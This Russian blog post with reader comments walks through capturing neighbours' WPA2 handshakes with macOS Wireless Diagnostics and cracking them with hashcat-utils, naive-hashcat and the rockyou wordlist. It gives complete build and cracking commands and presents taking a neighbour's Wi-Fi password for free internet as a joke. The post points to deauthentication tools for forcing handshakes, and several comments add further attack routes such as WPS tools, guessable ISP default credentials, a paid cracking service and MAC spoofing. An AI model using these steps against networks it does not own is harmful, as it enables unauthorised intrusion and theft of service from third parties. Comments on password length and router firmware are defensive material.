Я всегда был фанатом багов и уязвимостей «на поверхности», всегда завидовал чувакам, которые пишут эксплойты для самых защищённых ОС, а сам умел только скрипткиддить (термин из нулевых). Однако мой пост про уязвимости в системах контроля версий набрал более 1000 лайков на Хабре и остаётся топ1 постом за всю историю Хабра, несмотря на то, что был написан 9(!) лет назад.

И сегодня я хотел бы на пальцах показать и рассказать про такую штуку, как вардрайвинг. А точнее, как стандартными средствами MacOS можно добыть пароли от Wi-Fi соседей. Нелёгкая забросила меня на очередную квартиру. Как-то исторически сложилось, что я ленивый. Пару лет назад я уже писал, что моя лень, новая квартира и провод Beeline (бывшая Corbina) помогли мне найти багу у Билайна и иметь бесплатно интернет в их сети. «Сегодня» происходит «подобное», я на новой квартире, нет даже провода, но есть много сетей у соседей.


Заколебавшись расходовать мобильный трафик, я решил, что «соседям надо помогать», и под «соседями» я имел введу себя…

Когда-то давно я увлекался вардрайвингом, как раз именно до того момента, пока не обнаружил в старой квартире провод Билайна ) Там тоже было много сетей рядом и первое, что пришло в голову — мне нужен wi-fi. С тех пор прошло много лет. Обновляя свои данные про вардрайвинг, я нашёл в сети упоминание, что 90% работы спец.утилит «сегодня» можно сделать стандартными сервисами MacOS. Забегая вперёд, я хотел бы отметить, что не являюсь автором данного метода, я сам нашёл его в забугорном инете, просто, скажем, это вольный перевод и подробное, художественное описание способа добыть wi-fi пароли стандартными методами макоси, не более.

Принципы добычи паролей соседского Wi-Fi


Надо понимать, что имея Wi-Fi-приёмник, который есть сегодня в любом ноутбуке, ты можешь «снифать» весь беспроводной трафик около себя. Раньше, когда сети были открыты, достаточно было прийти в макдак и за вечер можно было получить 100-200 акков к одноклассникам. Открытая сеть + отсутсвие https делали своё дело.

Сейчас всё интереснее, все переходят на https (пользуясь случаем, хочу передать привет Lets Encypt. Любимый Lets Encypt, я в телевизоре и передаю вам привет, спасибо, что вы есть) и даже про WEP уже все забыли, все роутеры юзают WPA2. Но, как известно, меч был придуман раньше щита, и никакой WPA2 не помеха человеку, голодного до интернета и видящего около себя кучу Wi-Fi.

Продолжим. Имея Wi-Fi карту, т.е. любой современный ноутбук, мы можем снифать трафик возле себя. Но он бесполезен, ибо зашифрован. Единственное, что можно разобрать из него — метаданные, типа название сетей итп и «рукопожатия», handshake, т.е. авторизации пользователей в сети. Они происходят каждый раз, когда пользователь подключается к wi-fi-сети. Например, когда сосед приходит домой и его смартфон в кармане цепляется к домашнему wi-fi.

Если совсем грубо, рукопожатия представляют собой обычный хэш типа md5.
Это правда совсем грубо. Ключ там получается путем 4096 раундов SHA1. Если быть точным, то формула такая: Key = PBKDF2(HMAC?SHA1, passphrase, ssid, 4096, 256)

Кстати, можно заметить, что замешивается название точки, поэтому при уникальном названии предвычисления не помогают. И это аргумент за то, чтобы менять название точки на свое.
спасибо пользователю jia3ep

И да, я солгал в своём первом абзаце про «дешифрацию», это техническая ошибка и подмена понятий. Конечно, дешифровать хэш невозможно. Это как говорить «лицензия такси», зная, что деятельность такси в РФ не лицензируется. Но просто так удобней )

Так вот. Всё, что нам надо — это найти среди траффика радиосети вокруг себя рукопожатия и «дешифровать» их. И раньше была куча софта для всего это. Кто-то умел грамотно сканировать радиоканал, кто-то отлично его сниффал в дампы, кто-то находил хэши в дампах, кто-то умел их ломать. Сейчас всё стало проще, благодаря Тиму Куку. 90% работы за стороннее ПО делает стандартное приложение «Беспроводная диагностика». Многие его видели — когда проблемы с Wi-Fi, мак предлагает проверить сеть. Бесполезная утилита, которая даёт советы типа «перезагрузите роутер». Ну, т.е. мне так казалось )

Добываем пароли. Соседи вешайтесь ;)


Итак, погнали. Зажимаем Alt и кликаем по логотипу Wi-Fi в верхней панели. Вообще Alt и клик всегда открывает дополнительные опции в MacOS, но это тема отдельного топика.


Помимо прочей доп.инфы, которая порой очень полезная, мы можем запустить программу «Беспроводная диагностика». Думаю, все кто пользуются маком, помнят это окно.



Но нас интересует другое. Кликаем по пункту меню «Окно» и видим набор дополнительных утилит.


И тут прям есть всё, что надо, даже больше ) Конкретно нас интересуют 2 пункта. Сканирование и Анализатор. Первый покажет нам все сети вокруг с доп.инфой, типа на каком канале и на какой частоте работает сеть. Второй пункт позволит сниффать трафик на конкретном канале и частоте.




Нажимая на кнопку «Начать» в Анализаторе, Wi-Fi-карточка переключится в режим приёма и начнёт сканировать радиочастоту вокруг себя, дамп будет писаться в /var/tmp.



Файлы *.wcap это наши дампы, которые содержат бесполезный для нас траффик и нужные нам рукопожатия.

Надо понимать, что нам необходимо поймать именно рукопожатия. Т.е. нам надо поймать и сниффать траффик, когда сосед приходит домой вечером. Либо, если у вас есть ещё одно устройство на макоси, либо любой другой оси, вам помогут нюкеры. Программки, рассылающие поддельные команды деаунтефикации. Например, JamWiFi. Но это если прям совсем не терпится ) На моём опыте, достаточно просто запустить Анализатор в 6 вечера на часок.

Далее нам надо поставить naive-hashcat и hashcat-utils.

«Стоп» скажите вы, «ты же обещал взлом сетей соседа стандартными методами?» ) Ха! И вы мне поверили?! На самом деле мы стандартными методами сделали 90% работы через GUI. У нас уже есть хэши, всё что нам надо — разбить их. Уверен, можно всё сделать и стандартными утилитами, но проще юзать hashcat. Собираем софт через brew или из сорцов. Первым делом нам надо конвертировать наш дамп, оставив в нём только наши хэши. Этим занимается бинарник cap2hccapx из пакета.

# Качаем hashcat-utils
git clone https://github.com/hashcat/hashcat-utils.git
Cloning into 'hashcat-utils'...
remote: Counting objects: 403, done.
remote: Total 403 (delta 0), reused 0 (delta 0), pack-reused 403
Receiving objects: 100% (403/403), 114.23 KiB | 61.00 KiB/s, done.
Resolving deltas: 100% (257/257), done.

# Собираем бины
cd hashcat-utils/src/ && make
rm -f ../bin/*
rm -f *.bin *.exe
cc -Wall -W -pipe -O2 -std=gnu99  -o cap2hccapx.bin cap2hccapx.c
cc -Wall -W -pipe -O2 -std=gnu99  -o cleanup-rules.bin cleanup-rules.c
…
cc -Wall -W -pipe -O2 -std=gnu99  -o strip-bsr.bin strip-bsr.c
cc -Wall -W -pipe -O2 -std=gnu99  -o strip-bsn.bin strip-bsn.c

# Конвертируем дамп
./cap2hccapx.bin /var/tmp/2018.01.25_00-37-45-GMT+3.wcap /var/tmp/home.hccapx





Мы видим, что успели перехватить 2 рукопожатия, попробуем «сломать их». Для этого нам нужен naive-hashcat:

git clone https://github.com/brannondorsey/naive-hashcat
cd naive-hashcat

# Собираем софт для osx
./build-hashcat-osx.sh

# качаем вордлист для побора wpa/wpa2 сетей пароли (134MB)
curl -L -o dicts/rockyou.txt https://github.com/brannondorsey/naive-hashcat/releases/download/data/rockyou.txt

# указываем адрес нашего дампа и файл, куда будем писать подобранные пассы, 2500 это метка хэшкэту, что надо ломать именно WPA, ну и запускаем naive-hashcat

HASH_FILE=/var/tmp/home.hccapx POT_FILE=home-wifi.txt HASH_TYPE=2500 ./naive-hashcat.sh



Кошка пошла работать. В среднем у меня на маке я имею скорость в 2000 хешей в секунду, на скрине 7к, но это только старт. Судя по этому документу, на 1080gtx можно получить скорость в 400к хешей в секунду. Однако у меня всего 2 рукопожатия и не такой уж и большой словарь, поэтому пробежаться по нему не составило проблем. Смотрим файл home-wifi.txt, вуаля:



Вот и всё. К сожалению, эта сеть через несколько квартир от меня и на другом этаже, пинг 7 секунд ) Надо ловить соседа снизу или брать внешнюю wi-fi-карту с нормальной антенной. Но принцип, думаю, понятен.

Удачных сканирований вам, юные подованы вардрайверы. И большое спасибо разработчикам Kali Linux MacOS за такие подарки.

Ну и вы найдёте много ещё интересного тут.

Комментарии (212)


  1. joker2k1
    26.01.2018 22:34

    нищеброд )


    1. mobilz Автор
      26.01.2018 22:35
      +1

      зато свободный ;)


      1. joker2k1
        26.01.2018 22:39
        +1

        А если по сути, какая длинна пароля надежна? А от я чувствую что вокруг много таких же деятельных )


        1. mobilz Автор
          26.01.2018 22:44

          порядки такие, 8 сиволов на нормальном железе ломаются за пару часов, 10 символов — месяц. 12 символов — 120 лет


          1. MonkAlex
            26.01.2018 23:26

            Но у вас же в статье написано:
            # качаем вордлист для побора wpa/wpa2 сетей пароли (134MB)

            Т.е. на деле вы не делали полный перебор а просто проверили словарные пароли? Или я что-то не так понял?


            1. mobilz Автор
              26.01.2018 23:33

              верно, брутфорсить смысла нет. Как отметили ниже, надолго нагружать мак может дорого обойтись, в моём случае я прогнал по листу. Но цифры приведены для брутфорса и только для понимания порядков. Ферма из 1080 сможет и 12-ти значный сломать достаточно быстро, кмк.


              1. rustavelli
                27.01.2018 19:32
                +1

                надолго нагружать мак может дорого обойтись
                какой позор… Понакупают ноутов вместо нормальных стационарных компов, а потом боятся их использовать на полную.


                1. mobilz Автор
                  27.01.2018 19:32
                  +3

                  слабаки, согласен. пойду влажной солфеточкой экран протру. гейство сплошное


          1. Tihon_V
            26.01.2018 23:31

            Это при наличии слова в словаре.

            Интересно, как вы будете ломать, если в пароле есть смайл из UTF-8?

            P.S.: Habr «съел» один символ в конце сообщения `\u1f609`.


            1. mobilz Автор
              26.01.2018 23:34

              никак ) даже смайл не нужен, пробела зачастую достаточно )))


            1. needbmw
              26.01.2018 23:40

              Вообще-то согласно спецификации 802.11 кроме печатных символов ASCII в пароле не должно ничего быть


              1. mobilz Автор
                26.01.2018 23:41

                мы давно далеки от спецификаций )


              1. Tihon_V
                26.01.2018 23:54
                +1

                Может и так, но зачастую SOHO-роутеры используют hostapd в красивой обертке, а он — умеет использовать UTF-8 в пароле.
                И всё бы было замечательно, но Android — не позволяет ввести этот пароль.


                1. mobilz Автор
                  27.01.2018 00:12

                  ахахахаха. Андройд такой Андройд


          1. Mur81
            27.01.2018 19:32
            +1

            Всё, ребят, расходимся ;)


          1. g0rd1as
            28.01.2018 21:21

            У меня длина пароля больше 25 символов разного регистра + спецсимволы и цифры + явно не содержится в словаре, ломать будут до китайской Пасхи. :)


            1. mobilz Автор
              28.01.2018 21:53
              +1

              вы главный претендент на звание «неуловимый джо года»


          1. zartarn
            29.01.2018 10:02

            8 цифр, на ноутбучной GeForce GT 320M перебирается сутки. на 1060 — ~10 минут.
            А вот букваеноцифровые уже будет долго, очень. Оно того не стоит. Есть же WPS и Airgeddon.


            1. Tihon_V
              29.01.2018 17:01

              Будучи студентом — собирал в вузе кластер из pyrit и GTX560M-GT710M/AMD HD5470m-HD8750m с openCL. 20 ноутбуков считали порядка 250к PMK/s тупым перебором по словарю.


        1. rajven
          29.01.2018 19:11

          Никакая. WPA2 взломан. И если основные вендоры закрыли уязвимость на новом железе, то на клиентской стороне всё печально. Да и на старое железо никто из производителей обновлять софт не спешит.
          Вот из последнего горячего — habrahabr.ru/company/pentestit/blog/340182


          1. AC130
            30.01.2018 19:40

            Как бы взломали не WPA, а его косячную реализацию. mipt.ru/drec/news/166_ya_plenarnaya_sessiya_komiteta_po_standartizatsii_ieee_802_lmsc

            В рамках данной сессии также была обсуждена уязвимость сетей Wi-Fi к атаке KRACK, выявленная в этом году. Было отмечено, что как минимум в двух местах стандарта указано, что повторное использование пар временных ключей и номеров пакетов нарушает безопасность. Тем не менее, большинство разработчиков программного обеспечения для устройств Wi-Fi не учли это требование. Чтобы избежать подобной ошибки в дальнейшем, в описание алгоритма было явно добавлено условие, устраняющее найденную уязвимость.


  1. needbmw
    26.01.2018 23:22

    Вот долговременно нагружать макбук на 2000 PMK/s я бы не стал, перегреется и тогда интернет соседа может стать просто золотым…


    1. Firz
      27.01.2018 11:22

      Это у какой именно модели такая проблема, если не секрет?


  1. kormotodor
    26.01.2018 23:34

    Майнинг на Маке? Это что-то новое)


  1. Nikulio
    27.01.2018 00:12

    Если речь идет о хэше MD5, это 2**128. То есть, это значение размером в 4.253529586511731e+37 байта? (поделил на 8)


    1. mobilz Автор
      27.01.2018 00:12

      вы о чём?


  1. ttys
    27.01.2018 00:12

    Только мне кажется странным, что на мак денег хватило а на интернет нет? xD


    1. mobilz Автор
      27.01.2018 00:12

      Я, кстати, нигде не говорил, что я нищий. Я говорил, что я ленивый


      1. ttys
        27.01.2018 00:14

        Ну оно и видно, учитывая количество телодвижений для добычи интернета. ;)))


        1. mobilz Автор
          27.01.2018 00:16

          не, ну сидеть на диване и тыкань в ноут куда проще, чем звонить оператору, договариваться, чтобы их сотрудник пришёл, подключил инет. Нафиг ) Простые пути нас не интересуют.


          1. ttys
            27.01.2018 00:21

            Так определись уже, или ленивый или простые пути не интересуют. На ходу меняешь показания. ))


            1. mobilz Автор
              27.01.2018 00:25

              ленивый, но поэтому ещё больше ценю возможности «обойти систему». Из категории «раз мне лень установить себе интернет, то добуду его из недр, а не просто оплачу мобильный траффик»


            1. stychos
              27.01.2018 22:03
              +1

              Общеизвестно, что лень — лучший двигатель прогресса.


      1. Ugrum
        28.01.2018 14:37

        Не, ленивый начал бы с сетей 325.....463 и Keenetic-2742/9453 Есть у меня смутное подозрение, что там дефолтные настройки, admin/admin etc.


        1. mobilz Автор
          28.01.2018 17:15

          если в какой-то момент времени вам потребуются знания про x25 сети, обращайтесь ) до сих пор брутфорсер и сканер для модема us robotics есть.


        1. osipov_dv
          29.01.2018 10:00
          +1

          у кинетиков уже давно не стандартные пароли, там на брюхе наклейка со сгенерированным ключем wpa и админским


    1. Adel-S
      27.01.2018 00:31

      Автор, вроде, не говорил что это мак его личный. Мало ли, может на работе выдали?


      1. mobilz Автор
        27.01.2018 00:35

        угнал у соседа


        1. Boomburum
          27.01.2018 00:48
          +1

          Мне нужны твои макбук, пароль от вай-фая и мотоцикл)


          1. mobilz Автор
            27.01.2018 00:53

            … макбуки, пароль от вай-фая и ближайший барбершоп…


            1. bisor
              30.01.2018 18:57

              а как же вейп? ))


        1. barbanel
          29.01.2018 16:58

          «Снифнул» =)


        1. Keiron
          29.01.2018 19:04

          Тоже macOs помогла?)


    1. MagiC
      27.01.2018 08:59
      +4

      Никогда не интересовался взломом сетей. Пару недель назад тоже переехал в другую квартиру — оператору сообщил заранее о переезде, чтобы на старом месте интернет отключили, а на новом приехали подключили. Из саппорта оператора сказали: нужно ждать мастера неделю.
      Первые два дня сидел с мобильного подключения, на третий начал гуглить, как подключиться к wi-fi соседа.

      В общем, деньги тут не причём.


      1. Spectre
        27.01.2018 18:58
        +1

        А пойти и попросить соседа дать пароль на пару дней пока подключат?
        Если взять с собой пару пива эффект будет ошеломляющий и гораздо быстрее описанного в статье


        1. leshakk
          27.01.2018 19:07
          +2

          В аналогичной ситуации я с извинениями отказал. Не потому, что жмот, а потому, что не хочу стать фигурантом дела по распространению экстремистских материалов, детской порнографии или чего-то подобного.


          1. Areso
            27.01.2018 19:47

            Что не отменяет наличия такой возможности, если кто-то из соседей читал эту статью, или подобную этой на любом другом ресурсе и сломал именно вашу сеть. И не обязательно перебором — уязвимостей в прошивках сетевого оборудования хватает.


            1. Chamie
              28.01.2018 04:47

              А есть какие-то такие уязвимости, которые позволяют обойти WPA2 при отключенном WPS и включенной фильтрации по MAC-адресу?


              1. Areso
                28.01.2018 13:14

                Как вариант, включенный telnet с известным паролем. Или с неизвестным, но достаточно простым.
                MAC адрес копируем любой из ваших устройств. В дампе трафика видно все MAC адреса в вашей сети.


              1. Areso
                28.01.2018 13:50

                Как вариант, ваш роутер может смотреть в интернет весьма слабозащищенным интерфейсом.


              1. mobilz Автор
                28.01.2018 17:18

                тот пасс, который я добыл в примере, wpa2 с выключенным wps. даже если бы я понял, что мой мак фильтруют — я бы подделал бы его под автора и сидел бы в сети дальше


                1. Chamie
                  30.01.2018 20:33

                  Ну, это, всё-таки, перебором — это не обход WPA2. Мои 29 символов вряд ли так сломают


              1. arcman
                28.01.2018 17:37

                Имеет смысл поставить на роутер OpenWRT/LEDE что бы избежать косяков в самой прошивке.
                Вот например на популярном Netgear WNR612v2 сколько не отключай WPS он все равно успешно взламывается, что было для меня неожиданностью.


          1. keydon2
            27.01.2018 23:04

            А вы тут причем? Не вы же качали.


            1. leshakk
              28.01.2018 12:22
              +1

              Следователя в этом ещё предстоит убедить.
              Как минимум в таком случае доброму владельцу роутера гарантирован обыск с изъятием всей компьютерной техники и носителей информации (для проведения экспертизы).


              1. mobilz Автор
                28.01.2018 17:19

                раньше отдел И (ибо раньше он был И, а потом уже К) изымал у тебя монитор, только монитор, ибо он же показывает информацию. было смешно.


        1. Angel_D13
          28.01.2018 17:19

          Тот же вид мошенничества, только называется иначе — социально-сетевая инженерия.


    1. kopch
      27.01.2018 13:03

      Иногда это всё же пригождается. Особенно в Европе..))…


    1. iborzenkov
      27.01.2018 13:25

      Почему? Купили мак, а потом денег нет так как в кредит. Ну понятно что это не про автора, но ситуация то вполне типичная с любыми дорогими вещами сейчас.


    1. rustavelli
      27.01.2018 22:55

      очень удобно, когда за инет платит кто-то другой. И провайдеру звонит в случае неполадок. Удобнее даже, чем автоплатеж — его и то надо переделывать иногда.


    1. billyevans
      28.01.2018 08:04

      Маки никто не покупает. Их раздают на работе обычно, поэтому примерно всеравно сколько они стоят.


      1. webdevelopacc
        28.01.2018 12:18

        позвольте не согласиться, как человеку из нестолицы, где прошка стоит как 3 оклада


        1. billyevans
          28.01.2018 21:06

          Я тоже из сильного замкадья. Но да, бывают исключения, конечно. Когда как 3 оклада, тогда да, наверное это перебор.


      1. mobilz Автор
        28.01.2018 17:20

        насосал, всё проще


    1. KeySVG
      29.01.2018 19:03

      У меня 2 мака дома (iMac и MBP), но случилось как то первого числа что я не оплатил провайдеру счет. Забыл. А сетей соседских с пару десятков. Пара из них была открыта! С удовольствием припал на «хвосты»


      1. mobilz Автор
        29.01.2018 19:03

        аккуратней с такими комментами, сейчас прибегут люди и начнут обсуждать, откуда у вас деньги на макбуки


  1. sabio
    27.01.2018 00:32

    Для сетей с популярными SSID можно использовать готовые таблицы.
    Например, на Church of Wifi есть посчитанные хэши для 1000 популярных SSID и миллиона различных паролей. (33 ГБ)


    1. mobilz Автор
      27.01.2018 00:42

      Да, про Church слышал, но это уже совсем перебор ) на самом деле даже rockyou перебор, достаточно словаря на пару тысяч самых популярных паролей. Если не нашли — проще забить )


  1. zhovner
    27.01.2018 01:01

    Снифать wifi в macOS можно консольной утилитой airport.
    Я написал небольшой скрипт на python который дампает трафик на заданном канале и ищет в нем заданную строку github.com/zhovner/airport-sniffer

    Так как дамп пишется в формате pcap, его можно в реалном времени читать с помощью tcpdump или wireshark.


  1. Incomnia_Cat
    27.01.2018 01:03

    Ломаете wi-fi соседа, а сосед оказывается ветераном дарк веба. Телефоном и так не особо безопасно пользоваться, а тут ещё и через чужую сеть.

    P.S. Да я параноик, заберите меня с этой планеты.


    1. mobilz Автор
      27.01.2018 04:08

      мак меняешь на 12:34:56:78:90:AB и ветеран в netsend отправляет тебе «по пивку?»


      1. Ostan
        27.01.2018 16:05
        +1

        Тру хакеры MAC ставят такой — DE:AD:BE:AF:DE:AD


        1. svanichkin
          27.01.2018 16:52
          +1

          Для тех кто хочет знать больше tproger.ru/problems/dead-beef


        1. arcman
          27.01.2018 20:06

          DEADBEEFCAFE еще можно, что бы без повторов.
          А вообще:
          ru.wikipedia.org/wiki/Hexspeak


  1. YaRobot
    27.01.2018 01:37

    Интересно, спасибо.
    Но я настолько ленив, что даже не могу испытать этот метод и поделится результатом =(
    Извините.


    1. mobilz Автор
      27.01.2018 02:28

      бывает ((( не парься ( плати


  1. serg1301
    27.01.2018 06:03
    -7

    Ленивое делитанство!
    Установи Linux второй OS и лениво пиши реальные «опыты»…


    1. mobilz Автор
      27.01.2018 06:04
      +4

      а я типа так не делал?


    1. yarric
      27.01.2018 13:40

      Зачем так заморачиваться — макоси хватает.


      1. mobilz Автор
        27.01.2018 17:37

        freebsd форевер, панки хой!


        1. balsoft
          27.01.2018 19:31

          Ждём коммента про Солярис.


          1. mobilz Автор
            27.01.2018 19:31
            +2

            так себе тачка, киа рио круче


            1. bolk
              28.01.2018 15:53

              Это планета.


              1. Ugrum
                28.01.2018 16:14

                Не может быть!


              1. mobilz Автор
                28.01.2018 17:23

                знатный мотик, о юпитере все парни во дворе мечтали.


        1. maisvendoo
          29.01.2018 07:02

          macOS != freebsd, сколько можно повторять это?


          1. mobilz Автор
            29.01.2018 10:26

            ну пока вам не надоест, можете повторять


            1. maisvendoo
              29.01.2018 18:49

              По поводу статьи: посыл её понятен, ты идешь к успеху, купил себе мак. Совершенно очевидно, что соседи-терпилы обязаны делится с тобой тем, за что платят свои кровные. Ведь ты так занят, и тебе просто лень… Вполне можно понять это.

              Только почему ты, уважаемый, думаешь, что своим воровством ты не наносишь никому вреда? Чем ты гордишся тут, в своей писанине?


              1. webdevelopacc
                29.01.2018 18:59
                +1

                выдохните


              1. mobilz Автор
                29.01.2018 19:02

                «… почему ты, уважаемый …» это как в том КВН:
                — можно я к вам на ты?
                — можно…
                — слышь, ты, урод

                что конкретно вас задело? то, что macosx из коробки с gui позволяет делать подобные действия? или то, что wifi стандарт настолько дырявый, что wps даже домохозяйки выключают?
                Вы и дальше можете освещать своё жилище свечкой, ругаясь на электричество, что это злит Тора и Одина. А можете принять современный мир со всеми его плюсами и минусами. Можете ругать таких как я, а можете радоваться, что теперь вы в курсе как это делается и что нужно, чтобы это не произошло лично с вами.


                1. maisvendoo
                  29.01.2018 19:13

                  то, что macosx из коробки с gui позволяет...

                  А ещё, когда макбук лежит на столе, у того ножки подгибаются от счастья и восхищения :-D

                  что конкретно вас задело?

                  Контекст подачи материала

                  а можете радоваться, что теперь вы в курсе как это делается и что нужно, чтобы это не произошло лично с вами.

                  Да, я в курсе, и приму соответствующие меры на своем роутере


                  1. mobilz Автор
                    29.01.2018 19:17

                    контекст подачи материала у меня всегда такой, в дальнейшем можете игнорировать мои посты и будет вам счастье.


  1. Finesse
    27.01.2018 09:11
    -1

    У меня не запускается ни «./cap2hccapx», ни «./cap2hccapx.bin» из пакета «hashcat-utils» (скачал архив с GitHub по указанной ссылке). Решил проблему так:


    1. Распаковал архив.
    2. В терминале перешёл в директорию «bin» этого архива.
    3. В терминале выполнил команду «make».
    4. Запустил скрипт: «./cap2hccapx.bin /var/tmp/2018.01.25_00-37-45-GMT+3.wcap /var/tmp/home.hccapx».


    1. ildarchegg
      29.01.2018 12:51

      а могли бы чуть детальнее описать? выполняю

      Ildars-MacBook-Pro:bin ildar$ pwd
      /Users/ildar/hashcat/bin
      Ildars-MacBook-Pro:bin ildar$ make
      make: *** No targets specified and no makefile found.  Stop.
      


      1. ildarchegg
        29.01.2018 12:56

        Все понял, надо было скачать архив Source и запустить make в папке src


      1. Finesse
        29.01.2018 13:25

        Надо перейти в src, а не bin. Я перепутал, прошу прощения.


    1. Bogdan_s
      30.01.2018 09:58

      если не сложно, не могли бы вы подробно расписать решение данной проблемы.
      root# ./cap2hccapx /var/tmp/2018.01.30_14-29-53-GMT+10.wcap /var/tmp/home.hccapx
      -sh: ./cap2hccapx: No such file or directory


      1. mobilz Автор
        30.01.2018 09:58

        дописал в статье


      1. Finesse
        30.01.2018 12:12

        Ошибка означает, что в директории, из которой вы выполняете команду, нет файла «cap2hccapx». Чтобы её решить, нужно убедиться, что в терминале вы находитесь в нужной директории, и запускать файл «cap2hccapx.bin»:


        ./cap2hccapx.bin /var/tmp/2018.01.30_14-29-53-GMT+10.wcap /var/tmp/home.hccapx

        Если консоль скажет, что не может выполнить этот файл, то сделайте по инструкции из моего комментария (только в шаге 2 переходите не в bin, а в src).


  1. Darksa
    27.01.2018 09:38
    +5

    Автор молодец, конечно, статья хорошая. Однако это не вардрайвинг. Вкратце расскажу как это выглядело 8 назад. Одним из ключевых элементов была машина, желательно тонированная по кругу. С собой брался переходник питания от 12 вольт для ноутбука, сам ноутбук, внешний GPS-приемник, волшебный адаптер Wi-Fi от Orient с возможностью подключения внешней антенны на чипе Atheros и компактная антенна направленного типа (Уда-Яги) на Wi-Fi диапазон.

    Ноутбук на борту имел Ubuntu Linux 12.04 + kismet + gpsd + aircrack-ng
    Все это добро запускалось, и машина каталась около часика по всему району.
    После поездки визуализировались данные, преобразуясь в точки Google Earth, куда наносились все найденные сети, их BSSID и тип защиты. Если какая то из точек была интересна — машинка ехала туда и в зависимости от типа защиты юзались механизмы aircrack-ng. Для WEP-защиты весьма хорошо работала Chopchop-атака, позволяя собрать нужное количество векторов инициализации за 5-10 минут, для WPA устраивался шторм пересылок DeAuth-пакетов, после чего чаще всего можно было выловить handshake точки и уже в домашних условиях с аппетитом вскрывать ее с помощью разных словарей.

    Отдельное слово могу сказать про смешные устройства LaFonera FON, которые массово ставились абонентам провайдера Стрим, ныне ставшего МТСом. Все устройства, ввезенные в РФ этой компанией, по-дефолту защищались WPA-паролем из 10 символов. Вот только все символы были цифрами и первые 6 символов были одинаковы для всех устройств. Поймать handshake дело несложное, а перебрать 4 символа занимало 15 секунд даже на самом слабом ноутбуке.

    Сейчас времена изменились — проще заплатить за интернет, чем ломать точку. Так что берегите себя и не стоит все вышеперечисленное бежать и проверять. УК никто не отменял, а соответствующие органы будут безумно рады, когда вас поймают. Удачи!


    1. kedobear
      27.01.2018 13:03
      +2

      выглядело 8 назад

      Ноутбук на борту имел Ubuntu Linux 12.04

      2012+8=2020. Жить стало лучше?


      1. SamsonovAnton
        27.01.2018 14:17
        +1

        8 релизов Убунты назад — Darksa либо сейчас сидит на 16.04, либо пропустил несколько обновлений.

        Мне вот другое непонятно:

        Сейчас времена изменились — проще заплатить за интернет, чем ломать точку.
        А что раньше — проще было ездить на машине в соседний квартал всякий раз, когда хочется посидеть в Интернете, чем заплатить за подключение у себя в квартире? Кроме спортивного интереса, другого объяснения подобрать не могу.


        1. Darksa
          27.01.2018 15:08
          +1

          Это только в случае когда есть своя квартира, куда можно было провести интернет-канал. Спортивный интерес тоже был, разумеется.


          1. Andrusha
            28.01.2018 01:36

            Если что, в 2010 году уже была Йота :)


        1. mobilz Автор
          27.01.2018 19:11

          раньше был стрим с 256кб, фу фу фу, люблю современный мир. про модемы, ббски и прочее дно вообще не хочу вспоминать


        1. vire
          27.01.2018 19:14

          Здесь кайф в другом, это больше похоже на рыбалку — вкладываешь миллион в снаряжение, чтобы поймать рыбы на 100 руб. Тем более 2010 год — это уже как пять лет 100мбит за 300-500 руб. в каждой квартире(ну, для больших городов)


          1. mobilz Автор
            27.01.2018 19:14

            вкладываешь лям в снаряжение, чтобы бухнуть с другом на морозе ) зато с салом )


      1. Darksa
        27.01.2018 15:07

        Прошу прощения, с утра мозг плохо соображал — релиз 10.04.


    1. leshakk
      27.01.2018 18:54
      +1

      Лет десять лет назад один молодой отец периодически гулял по району со своим маленьким сыном в коляске. А в те времена WiFi-роутеры многих популярных производителей по умолчанию предоставляли полностью открытый WiFi. Так что на прогулку папа брал ещё и нетбук (планшеты получили распространение уже позже) и они неспешно прогуливались к какому-нибудь из нескольких мест, в которых по WiFi был доступен интернет через роутер, владелец которого не удосужился поменять заводские настройки. А таких мест было реально много. Там можно было присесть на лавочку и спокойно посёрфить, пока малыш сладко спал в своей коляске.


      Однажды папа даже обнаружил локалку, где на компе была расшарена (разумеется, без какого-либо ограничения доступа) папка "Мои документы" c соответствующим содержимым. Не выдержав, папа положил в корень файл с именем "ПОСТАВЬ ПАРОЛЬ НА WiFi !!!!!!!.doc" и кратким описанием внутри, зачем это надо и как сделать. Не помогло. В те времена домашний интернет был уже безлимитный, а за посты в соцсетях ещё не сажали, так что владелец роутера на предупреждения забил.


      PS. Всё вышеизложенное является исключительно плодом фантазии автора поста, любые совпадения с реальными событиями случайны.


      1. mobilz Автор
        27.01.2018 19:19

        «один мой друг» был чуть не единственным «компьютерщиком» в городе. а так как был молод, деньги за свои услуги не брал, поэтому был востребован. а потом увлёкся безопасностью и всем, кому «чинил» комп расшаривал все диски, объясняя это тем, что «техподдержки майкрософт будет проще так помочь и исправить ваши баги если что». народ верил.


    1. arcman
      27.01.2018 20:20

      Сейчас для вардрайвинга есть приложение для смартфона (и сайт с базой) WiGLE.


  1. akamajoris
    27.01.2018 09:56
    +2

    1. Denai
      27.01.2018 14:05

      100р за одну соседскую точку? Не проще ли себе проплатить интернет?


      1. Areso
        27.01.2018 19:44
        +1

        Некоторые фирмы принимают в биткоинах, и цена там выше.
        К тому же, 100 рублей 1 раз < 300 рублей * N месяцев.


    1. Chamie
      28.01.2018 04:58

      Интересно, а мой ключ на 29 символов они расшифруют?


      1. mobilz Автор
        28.01.2018 17:24

        нет, но при желании и паяльнике ты сам его расскажешь )


        1. Chamie
          30.01.2018 20:32

          У меня есть желание и паяльник, но я не расскажу.


  1. Areso
    27.01.2018 10:02
    +1

    Короче, из gui только трафик записали. Не так давно проделывал (из любопытства) подобный фокус на линухе. С энной попытки все получилось.
    И да, не только лишь все wi-fi адаптеры умеют переходить в режим прослушки сети.


  1. FreeManOfPeace
    27.01.2018 10:06

    Крякалки то у нас есть, нам бы вордлист нормальный, может кто поделится актуальным для СНГ. Поделюсь своим для затравки, но он как то не очень, да и проверяется за одну секунду.


    1. mobilz Автор
      27.01.2018 19:21

      я когда билайн «поимел», там помимо прочего была бага в роутерах, которые без авторизации раздавали логины/пароли от wifi. У меня был гениальный план собрать все пассы для вордлиста, но мне стало лень…


  1. Andrus_Trash
    27.01.2018 12:07

    В High Sierra диагностика крашится.

    Пара-пара-пам!


    1. NiPh
      27.01.2018 13:53

      В 10.13.3 v6 —  работает нормально


      1. Andrus_Trash
        27.01.2018 16:55

        10.13.2 у меня. Обновиться чтоли…


    1. mobilz Автор
      27.01.2018 19:22

      10.12.6, полёт нормальный. но дело точно в оси


  1. gearbox
    27.01.2018 14:36
    +1

    Понял что я ничего не знаю о своем маке.


  1. pewpew
    27.01.2018 15:16

    А что делать тем, у кого видеокарта слабовата?

    hashcat (v4.0.1-115-g01a7476) starting...

    * Device #2: This device's local mem size is too small.
    No devices found/left.

    Started: Sat Jan 27 16:02:48 2018
    Stopped: Sat Jan 27 16:02:48 2018

